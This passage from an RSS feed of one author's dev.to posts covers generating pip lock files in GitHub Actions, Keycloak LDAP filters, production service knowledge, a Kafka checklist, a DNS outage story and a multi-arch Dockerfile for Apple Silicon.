  &lt;span class="na"&gt;build-requirements-lock&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;runs-on&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ubuntu-22.04&lt;/span&gt;
    &lt;span class="na"&gt;steps&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;uses&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;actions/checkout@v3&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Set up Python &lt;/span&gt;&lt;span class="m"&gt;3.9&lt;/span&gt;
        &lt;span class="na"&gt;uses&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;actions/setup-python@v3&lt;/span&gt;
        &lt;span class="na"&gt;with&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
          &lt;span class="na"&gt;python-version&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;3.9"&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Install pip and pip-tools&lt;/span&gt;
        &lt;span class="na"&gt;run&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
          &lt;span class="s"&gt;pip install --upgrade pip&lt;/span&gt;
          &lt;span class="s"&gt;pip install --upgrade pip-tools&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Run pip-compile&lt;/span&gt;
        &lt;span class="na"&gt;run&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
          &lt;span class="s"&gt;pip-compile --allow-unsafe --generate-hashes --no-emit-index-url --output-file=requirements-lock.txt &amp;gt; requirements-lock.txt&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Upload requirements-lock artifact&lt;/span&gt;
        &lt;span class="na"&gt;uses&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;actions/upload-artifact@v3.1.1&lt;/span&gt;
        &lt;span class="na"&gt;with&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
          &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;requirements-lock&lt;/span&gt;
          &lt;span class="na"&gt;path&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;requirements-lock.txt&lt;/span&gt;
          &lt;span class="na"&gt;retention-days&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;3&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;em&gt;build-requirements-lock-workflow&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;The Github Actions manifest above defines a workflow that can be triggered manually on any branch you like.&lt;/p&gt;

&lt;p&gt;Suppose you're upgrading some dependencies in requirement.txt. &lt;code&gt;pip install -r requirements.txt&lt;/code&gt; works fine. Now you want to generate a new lock file for the users. You commit the changes to your branch, wait for the tests to pass, and trigger the workflow:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--LvmUHVGR--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://akrisanov.com/content/images/2023/10/Screenshot-2023-10-12-at-17.35.26.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--LvmUHVGR--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://akrisanov.com/content/images/2023/10/Screenshot-2023-10-12-at-17.35.26.png" alt="" width="800" height="352"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;Github Actions Workflow&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;A freshly generated requirements-lock.txt appears in downloadable artifacts. You download the file and add it to the repo.&lt;/p&gt;

&lt;p&gt;Another option might be to run a similar workflow in a Docker container. I posted a note about multi-architecture builds a few months ago. &lt;a href="https://dev.to/akrisanov/building-multi-arch-images-for-arm-and-x86-2802"&gt;Take a look!&lt;/a&gt; Just make sure you choose the same architecture and Python version that you want to distribute your project to.&lt;/p&gt;




&lt;p&gt;Other tools like Poetry might do the job better and provide more convenient ways of managing lock files. But if you have reasons to not use them, it's totally fine to stick with good old pip.&lt;/p&gt;

</description>
      <category>github</category>
      <category>devops</category>
      <category>python</category>
    </item>
    <item>
      <title>Synchronizing Users From LDAP With Keycloak Using AD Filters</title>
      <dc:creator>Andrey Krisanov</dc:creator>
      <pubDate>Sat, 23 Sep 2023 19:32:41 +0000</pubDate>
      <link>https://dev.to/akrisanov/synchronizing-users-from-ldap-with-keycloak-using-ad-filters-25o3</link>
      <guid>https://dev.to/akrisanov/synchronizing-users-from-ldap-with-keycloak-using-ad-filters-25o3</guid>
      <description>&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--KVJBiqN1--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://akrisanov.com/content/images/2023/09/liljeforsgeese.webp" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--KVJBiqN1--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://akrisanov.com/content/images/2023/09/liljeforsgeese.webp" alt="Synchronizing Users From LDAP With Keycloak Using AD Filters" width="800" height="468"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;One of the ways to synchronize users via a third-party provider with Keycloak is a mechanism called User Federation. It allows, using Kerberos or LDAP protocol, to pull user entries from your corporate authentication storage. However, if your organization is big enough to have a complex structure and there are a lot of users in the user directory, it could be challenging to get only a subset of the accounts that belong to different organization units.&lt;/p&gt;

&lt;p&gt;For example, Active Directory models a tree-based structure using the following entities:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;CN = Common Name&lt;/li&gt;
&lt;li&gt;OU = Organizational Unit&lt;/li&gt;
&lt;li&gt;DC = Domain Component&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;All the distinguished names can be found in &lt;a href="https://docs.microsoft.com/en-us/previous-versions/windows/desktop/ldap/distinguished-names?ref=akrisanov.com"&gt;the official documentation&lt;/a&gt; provided by Microsoft.&lt;/p&gt;

&lt;p&gt;To configure a new User Federation in Keycloak, it's required to specify a User DN. This distinguished name is the base object in the directory information tree where the search begins forming candidates for pulling authentication entries. Therefore, we need to know how to construct the User DN.&lt;/p&gt;

&lt;p&gt;The base option that an Active Directory administrator could use to create user accounts is to organize them under organizational units:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;OU=Main,DC=Orgname,DC=ru
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Even if your organizational unit has a complex structure, it's still relatively easy for Keycloak to find user entries inside it – just activate the &lt;code&gt;Search Scope: Subtree&lt;/code&gt; setting when configuring the user federation. In large organizations, the Active Directory structure can get quite messy. Instead of using clear distinguished names, administrators do something surprising even to them. How about putting entries under CN in different organizational units?&lt;/p&gt;

&lt;p&gt;This is what I encountered while working on corporate user authentication for a media platform's CMS. User entries of the editors were grouped via the Common Name. So, there is no way to define User DN in the way I've mentioned in the example above. Fortunately, the LDAP connection allows providing a filter for Active Directory. In my case, writing the filter to select all of the members of the &lt;code&gt;CMS_EDITOR&lt;/code&gt; group was enough to solve a problem:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;(&amp;amp;(objectCategory=Person)(sAMAccountName=*)(|(memberOf=CN=CMS_EDITOR,OU=Security,OU=Groups,OU=Central,OU=Main,DC=Orgname,DC=ru)))
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Moreover, the &lt;code&gt;Custom User LDAP Filter&lt;/code&gt; setting in Keycloak supports logical operators like &lt;em&gt;or&lt;/em&gt; with &lt;code&gt;|&lt;/code&gt;, and I could use it for finding not only the members of the editor staff but also CMS admins, guests, etc.&lt;/p&gt;

</description>
      <category>keycloak</category>
      <category>authentication</category>
      <category>ldap</category>
    </item>
    <item>
      <title>Understand How Services Are Run And Operate In Production</title>
      <dc:creator>Andrey Krisanov</dc:creator>
      <pubDate>Wed, 06 Sep 2023 17:30:51 +0000</pubDate>
      <link>https://dev.to/akrisanov/understand-how-services-are-run-and-operate-in-production-2e12</link>
      <guid>https://dev.to/akrisanov/understand-how-services-are-run-and-operate-in-production-2e12</guid>
      <description>&lt;p&gt;Over the past few years, I've been interviewing dozens of software engineers who didn't know how their developed services run and operate in production. The reason for that is a rising trend in software engineering trusting in an infrastructure team, the magic of the cloud, Docker, Kubernetes, and whatnot.&lt;/p&gt;

&lt;p&gt;A conversation with a talent usually looks the following:&lt;/p&gt;

&lt;p&gt;– How do you ship your service to production?&lt;br&gt;&lt;br&gt;
– We build Docker images and run containers.&lt;br&gt;&lt;br&gt;
– Sounds cool! Can you tell me about the resource requirements for a container?&lt;br&gt;&lt;br&gt;
– Hmm, to be honest, I don't know the details. DevOps folks take care of that.&lt;br&gt;&lt;br&gt;
– (discussing Python app) OK. And what application server do you use?&lt;br&gt;&lt;br&gt;
– Application Server? (Some people even reply: "You mean WSGI?")&lt;br&gt;&lt;br&gt;
– Yes, the thing that handles web requests and runs your Python code.&lt;br&gt;&lt;br&gt;
– Hmm, let me open a project repo and check...&lt;br&gt;&lt;br&gt;
– It's...Gunicorn!&lt;br&gt;&lt;br&gt;
– Great. Can you estimate how many requests the web application can handle?&lt;br&gt;&lt;br&gt;
– I don't think so because we don't do load testing.&lt;br&gt;&lt;br&gt;
– So, it's not possible to do even a rough estimation?&lt;br&gt;&lt;br&gt;
– Nope.&lt;br&gt;&lt;br&gt;
– OK. Do you understand what happens on a processes and threads level when the application server processes a request?  &lt;/p&gt;

&lt;p&gt;This is where the conversation hits a dead end. Many talents don't. And this is a red sign to me. It gets worse when a candidate claims they have experience with (semi)async services in production but can't &lt;a href="https://docs.gunicorn.org/en/stable/design.html?ref=akrisanov.com#server-model"&gt;explain a service model&lt;/a&gt; they have chosen and how the services operate because of that (including resources allocating and consumption).  &lt;/p&gt;

&lt;p&gt;You might say: "Why do I need to know all that low-level stuff in the 2020s?". Fair enough...if you don't develop software for thousands of users, have an unlimited budget for underutilized hardware, don't design distributed systems, or, simply, have an SRE team ready to solve all possible issues for you. Otherwise, please do.&lt;/p&gt;

</description>
      <category>services</category>
      <category>sre</category>
      <category>python</category>
      <category>servers</category>
    </item>
    <item>
      <title>Choosing Apache Kafka For A New Project – A Questionnaire</title>
      <dc:creator>Andrey Krisanov</dc:creator>
      <pubDate>Mon, 28 Aug 2023 22:03:22 +0000</pubDate>
      <link>https://dev.to/akrisanov/choosing-apache-kafka-for-a-new-project-a-questionnaire-285b</link>
      <guid>https://dev.to/akrisanov/choosing-apache-kafka-for-a-new-project-a-questionnaire-285b</guid>
      <description>&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--855GpXOc--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://akrisanov.com/content/images/2023/08/Biard-Franc-ois-Auguste---The-Duke-of-Orle-ans-Descending-the-Great-Rapids-of-the-Eijampaika-on-the-Mionio-River-in-Lapland--August-1795-.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--855GpXOc--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://akrisanov.com/content/images/2023/08/Biard-Franc-ois-Auguste---The-Duke-of-Orle-ans-Descending-the-Great-Rapids-of-the-Eijampaika-on-the-Mionio-River-in-Lapland--August-1795-.jpg" alt="Choosing Apache Kafka For A New Project – A Questionnaire" width="800" height="637"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;In any modern project where there is a need to process events – a set of messages or a stream of data – developers often propose Apache Kafka as the infrastructure solution. This is not always a weighted choice – where a classic broker like ActiveMQ will do, marketing sometimes prevails.&lt;/p&gt;

&lt;p&gt;But let's assume that you have deliberately chosen Kafka, or that the infrastructure team has left you no alternative. Before setting up broker parameters and writing producers and consumers, what questions should you ask yourself? To ensure a smooth start, I have prepared the following checklist/questionnaire:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;The amount of data that is going to be generated by the producers → Will &lt;strong&gt;the network channel&lt;/strong&gt; be sufficient for the entire system and its critical components? Is there an option to make use of &lt;a href="https://www.conduktor.io/kafka/kafka-message-compression/?ref=akrisanov.com"&gt;message compression&lt;/a&gt;?&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://strimzi.io/blog/2021/12/17/kafka-segment-retention/?ref=akrisanov.com"&gt;&lt;strong&gt;Data retention policy&lt;/strong&gt;&lt;/a&gt;: How long do you need to keep data? → Consider the business and data protection requirements of a product you are developing, and the cost of storing data.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Message sending guarantees (&lt;a href="https://www.conduktor.io/kafka/kafka-producer-acks-deep-dive/?ref=akrisanov.com"&gt;Acks&lt;/a&gt;)&lt;/strong&gt; → Finding the right balance between latency and reliability within replication (durability).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Message delivery guarantees&lt;/strong&gt; → How critical is message loss or duplication of messages to the business objective? Are &lt;a href="https://www.conduktor.io/kafka/idempotent-kafka-producer/?ref=akrisanov.com"&gt;idempotency&lt;/a&gt; and &lt;a href="https://www.confluent.io/blog/transactions-apache-kafka/?ref=akrisanov.com"&gt;transactionality&lt;/a&gt; needed?&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;What &lt;a href="https://redpanda.com/guides/kafka-tutorial/kafka-partition-strategy?ref=akrisanov.com"&gt;partitioning strategy&lt;/a&gt; will producers use?&lt;/strong&gt; → Is the default strategy (&lt;code&gt;Default partitioner&lt;/code&gt;) appropriate?&lt;/li&gt;
&lt;li&gt;For a particular topic, is it important to store the entire message log, or are the latest changes sufficient → Consider using &lt;a href="https://docs.aiven.io/docs/products/kafka/concepts/log-compaction?ref=akrisanov.com"&gt;&lt;strong&gt;Compacted&lt;/strong&gt;&lt;/a&gt; &lt;strong&gt;&lt;a href="https://docs.confluent.io/kafka/design/log_compaction.html?ref=akrisanov.com"&gt;topics&lt;/a&gt;&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Do the created topics require a &lt;a href="https://www.conduktor.io/kafka/kafka-consumer-groups-and-consumer-offsets/?ref=akrisanov.com"&gt;consumer group&lt;/a&gt;?&lt;/strong&gt; → How do you plan to scale consumers and their bandwidth? What happens when the group is &lt;a href="https://www.verica.io/blog/understanding-kafkas-consumer-group-rebalancing/?ref=akrisanov.com"&gt;rebalanced&lt;/a&gt;?&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;That's it. The checklist/questionnaire is by no means exhaustive and it only covers the essentials. It leaves out a lot of things such as data encryption, authentication, authorisation, and cluster configuration – assuming that the SRE team or some PAAS will take care of that for you.&lt;/p&gt;

</description>
      <category>kafka</category>
      <category>checklist</category>
      <category>sre</category>
    </item>
    <item>
      <title>My "It's not DNS" story</title>
      <dc:creator>Andrey Krisanov</dc:creator>
      <pubDate>Sat, 12 Aug 2023 12:14:55 +0000</pubDate>
      <link>https://dev.to/akrisanov/my-its-not-dns-story-1k1h</link>
      <guid>https://dev.to/akrisanov/my-its-not-dns-story-1k1h</guid>
      <description>&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fakrisanov.com%2Fcontent%2Fimages%2F2023%2F08%2Falways-dns-1024x362.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fakrisanov.com%2Fcontent%2Fimages%2F2023%2F08%2Falways-dns-1024x362.jpg" alt="My "&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Summer of 2019. I'm joining a large retail organisation that is undergoing a digital transformation. The role I've been hired for is a technical leadership role. The project I'm taking over doesn't even have a complete team yet, which means I'll be wearing all sorts of hats until I hire someone and delegate work. You could say, I'm the only "developer" on the team. Also, the code base is already serving users, and the services are part of a lead generation funnel for one of the grocery networks. So if something goes down, the company loses potential customers and revenue. The fact that the project was developed by an outsourced team that has already left without handing over proper documentation makes things more complicated and fragile.&lt;/p&gt;

&lt;p&gt;In a few days, I try to understand how the services are run in production, write missing README and system design papers, and create initial tasks for maintenance. All goes well, and I manage to deploy some changes to the backend. It's Friday afternoon, so I still have time to do a rollback if I've made a mistake. But nothing suspicious has been observed during the day, and I leave the office for the weekend.&lt;/p&gt;

&lt;p&gt;The fun begins on Sunday. Because I'm in charge of the project, I'm the one who is on-call. I get a call from our support team telling me that the web application isn't responding from time to time and that they're getting complaints from customers.&lt;/p&gt;

&lt;p&gt;The first thing I do is open my browser to check what users are seeing. Surprisingly, a web page loads just fine. I hit refresh – same result. Then I turn off Wi-Fi on my iPhone and open Safari – 504 error. It's a Nginx page. Now it is something.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fakrisanov.com%2Fcontent%2Fimages%2F2023%2F08%2FDNS.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fakrisanov.com%2Fcontent%2Fimages%2F2023%2F08%2FDNS.jpg" alt="My "&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;Simplified diagram of the project architecture&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;I open the monitoring and observe no high load. CPU usage is low, more than 50% of memory is free, plenty of free disk space on each of the virtual machines, no spikes in the network bandwidth. Looking at the Nginx logs only proves that there's a gateway timeout error related to the backend. I should check the application backend logs. Nothing there, no errors at all.&lt;/p&gt;

&lt;p&gt;At this point, I start to blame the network and call the network infrastructure team. These guys work on an organisational level and potentially can see what I can't. After spending an hour investigating together, we see nothing. It's already Sunday evening, and I'm almost hopeless.&lt;/p&gt;

&lt;p&gt;I decide to take a break and go for a walk. When I'm back, I try to ssh to a VM again. Suddenly, I notice a few seconds of delay before I can type my commands into a terminal. "It can't be DNS", I say to myself. To prove it, I ping a public domain from our network. Again, a few seconds of delay and the network packets are flying without a hitch. "If DNS was down, the infrastructure team would notice.", I continue to reason. Before escalating the situation further to upper management, I choose to check the DNS configuration on the backend virtual machines.&lt;/p&gt;

&lt;p&gt;The &lt;code&gt;/etc/resolv.conf&lt;/code&gt; is a DNS resolver configuration file. It contains records in the following format:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;nameserver [ip]
nameserver [ip]
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;em&gt;/etc/resolv.conf&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;In my developer's mind, a Linux machine receives these records at boot time and caches them. This file is then queried to resolve domains. What could possibly go wrong? Well, I ask the infrastructure team about the IP addresses I see in &lt;code&gt;/etc/resolv.conf&lt;/code&gt; and get a surprising answer: "The IP addresses are DNS load balancers and the first one in the list is currently down". Hearing this, I begin to understand why the ssh and initial ping delays are happening. The first DNS load balancer is queried, but because it's down, it doesn't respond, and the resolution continues with the second IP address.&lt;/p&gt;

&lt;p&gt;I remove the first nameserver from &lt;code&gt;/etc/resolv.conf&lt;/code&gt; and drop the DNS cache on each of the VMs. After a few seconds, the 504 error and the gateway timeout disappear. In the morning, we'll discuss the incident with the infrastructure team and senior management. Fun week ahead.&lt;/p&gt;






&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;It's not DNS
There's no way it's DNS
It was DNS
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;em&gt;Old Japanese Haiku&lt;/em&gt;&lt;/p&gt;

</description>
      <category>dns</category>
    </item>
    <item>
      <title>Building Multi-Arch Images for Arm and x86</title>
      <dc:creator>Andrey Krisanov</dc:creator>
      <pubDate>Thu, 10 Aug 2023 19:58:44 +0000</pubDate>
      <link>https://dev.to/akrisanov/building-multi-arch-images-for-arm-and-x86-2802</link>
      <guid>https://dev.to/akrisanov/building-multi-arch-images-for-arm-and-x86-2802</guid>
      <description>&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--5_Re3RFp--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://akrisanov.com/content/images/2023/08/Container-Ship-Painting-by-Nicholas-Leverington.jpeg" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--5_Re3RFp--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://akrisanov.com/content/images/2023/08/Container-Ship-Painting-by-Nicholas-Leverington.jpeg" alt="Building Multi-Arch Images for Arm and x86" width="800" height="443"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;© Container Ship Painting by Nicholas Leverington, United Kingdom&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;At work, I am involved in the development of a machine learning SDK and cloud services for privacy and data protection. Like almost every company in this space, we rely heavily on Python's scientific ecosystem. Because it's quite mature and depends on native library development that started years ago, getting these packages to work on new architectures can be tedious.&lt;/p&gt;

&lt;p&gt;I am one of the few developers on our team who has stuck with MacOS and have a Macbook Pro with M1 chip. There is no easy way for me to bootstrap our development environment in a matter of minutes. I have to use Conda, install specific versions of Python packages, patch some native libraries, and even create a symlink from an OS-specific package to its generic name (I'm talking to you, Tensorflow). People on the &lt;code&gt;x86_64&lt;/code&gt; architecture generally won't have this problem – almost every package we use comes with a pre-built wheel for a chosen OS. Moreover, to install the SDK as a dependency of, say, an HTTP API service, I had to assemble it from sources: &lt;code&gt;pip install -e '.'&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;A few months ago we didn't even support the Arm64 architecture at a build level. This changed when I introduced a Github Action pipeline to build Python wheels for Linux &lt;code&gt;x86_64&lt;/code&gt;, &lt;code&gt;aarch64&lt;/code&gt;, and &lt;code&gt;universal&lt;/code&gt;. Instead of manually compiling some native libraries on my machine, I moved the work to GitHub and its Linux instances. From that moment on, I could just get the package from a private PyPI registry. The sad truth is that I still use Conda and sometimes patch one or two transitive dependencies for my M1 chip. But other than that, no hard times to date.&lt;/p&gt;

&lt;p&gt;Today I needed to distribute a newly created API service with the SDK inside as a Docker image. And I haven't found an easy way to define a Dockerfile that can be built and run on Apple Silicon without Conda:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight docker"&gt;&lt;code&gt;&lt;span class="k"&gt;FROM&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s"&gt;python:3.9-slim-buster&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;AS&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s"&gt;base&lt;/span&gt;

&lt;span class="k"&gt;ENV&lt;/span&gt;&lt;span class="s"&gt; PYTHONDONTWRITEBYTECODE=1&lt;/span&gt;
&lt;span class="k"&gt;ENV&lt;/span&gt;&lt;span class="s"&gt; PYTHONUNBUFFERED=1&lt;/span&gt;

&lt;span class="c"&gt;# Install Conda&lt;/span&gt;

&lt;span class="k"&gt;RUN &lt;/span&gt;apt-get update &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; apt-get &lt;span class="nt"&gt;-y&lt;/span&gt; upgrade
&lt;span class="k"&gt;RUN &lt;/span&gt;apt-get &lt;span class="nb"&gt;install&lt;/span&gt; &lt;span class="nt"&gt;-y&lt;/span&gt; &lt;span class="nt"&gt;--no-install-recommends&lt;/span&gt; build-essential g++ gcc libssl-dev cmake git wget
&lt;span class="k"&gt;RUN &lt;/span&gt;&lt;span class="nb"&gt;rm&lt;/span&gt; &lt;span class="nt"&gt;-rf&lt;/span&gt; /var/lib/apt/lists/&lt;span class="k"&gt;*&lt;/span&gt;

&lt;span class="k"&gt;ENV&lt;/span&gt;&lt;span class="s"&gt; PATH="/root/miniconda3/bin:${PATH}"&lt;/span&gt;
&lt;span class="k"&gt;ARG&lt;/span&gt;&lt;span class="s"&gt; PATH="/root/miniconda3/bin:${PATH}"&lt;/span&gt;

&lt;span class="k"&gt;RUN &lt;/span&gt;wget &lt;span class="se"&gt;\
&lt;/span&gt;    https://repo.anaconda.com/miniconda/Miniconda3-latest-Linux-aarch64.sh &lt;span class="se"&gt;\
&lt;/span&gt;    &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="nb"&gt;mkdir&lt;/span&gt; /root/.conda &lt;span class="se"&gt;\
&lt;/span&gt;    &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; bash Miniconda3-latest-Linux-aarch64.sh &lt;span class="nt"&gt;-b&lt;/span&gt; &lt;span class="se"&gt;\
&lt;/span&gt;    &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="nb"&gt;rm&lt;/span&gt; &lt;span class="nt"&gt;-f&lt;/span&gt; Miniconda3-latest-Linux-aarch64.sh

&lt;span class="c"&gt;# Create a Conda environment and install native dependencies&lt;/span&gt;

&lt;span class="k"&gt;RUN &lt;/span&gt;&lt;span class="nt"&gt;--mount&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nb"&gt;type&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;cache,target&lt;span class="o"&gt;=&lt;/span&gt;/root/.cache &lt;span class="se"&gt;\
&lt;/span&gt;    conda init bash &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="nb"&gt;.&lt;/span&gt; /root/.bashrc &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="se"&gt;\
&lt;/span&gt;    conda update conda &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="se"&gt;\
&lt;/span&gt;    conda create &lt;span class="nt"&gt;-n&lt;/span&gt; de_agent &lt;span class="nv"&gt;python&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;3.9 &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="se"&gt;\
&lt;/span&gt;    conda &lt;span class="nb"&gt;env &lt;/span&gt;config vars &lt;span class="nb"&gt;set&lt;/span&gt; &lt;span class="nt"&gt;-n&lt;/span&gt; de_agent &lt;span class="nv"&gt;LD_PRELOAD&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;/usr/lib/aarch64-linux-gnu/libgomp.so.1 &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="se"&gt;\
&lt;/span&gt;    conda activate de_agent &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="se"&gt;\
&lt;/span&gt;    conda &lt;span class="nb"&gt;install &lt;/span&gt;gdal llvmdev dm-tree &lt;span class="nt"&gt;-y&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="se"&gt;\
&lt;/span&gt;    pip &lt;span class="nb"&gt;install&lt;/span&gt; &lt;span class="nt"&gt;--upgrade&lt;/span&gt; pip setuptools wheel &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="se"&gt;\
&lt;/span&gt;    pip &lt;span class="nb"&gt;install &lt;/span&gt;h3

&lt;span class="c"&gt;# Copy application files&lt;/span&gt;

&lt;span class="k"&gt;WORKDIR&lt;/span&gt;&lt;span class="s"&gt; /app&lt;/span&gt;

&lt;span class="k"&gt;COPY&lt;/span&gt;&lt;span class="s"&gt; app/ .&lt;/span&gt;
&lt;span class="k"&gt;COPY&lt;/span&gt;&lt;span class="s"&gt; logging.yaml .&lt;/span&gt;
&lt;span class="k"&gt;COPY&lt;/span&gt;&lt;span class="s"&gt; main.py .&lt;/span&gt;
&lt;span class="k"&gt;COPY&lt;/span&gt;&lt;span class="s"&gt; requirements.txt ./&lt;/span&gt;

&lt;span class="c"&gt;# Install Python packages&lt;/span&gt;

&lt;span class="k"&gt;ARG&lt;/span&gt;&lt;span class="s"&gt; DE_AGENT_PYPI_TOKEN&lt;/span&gt;

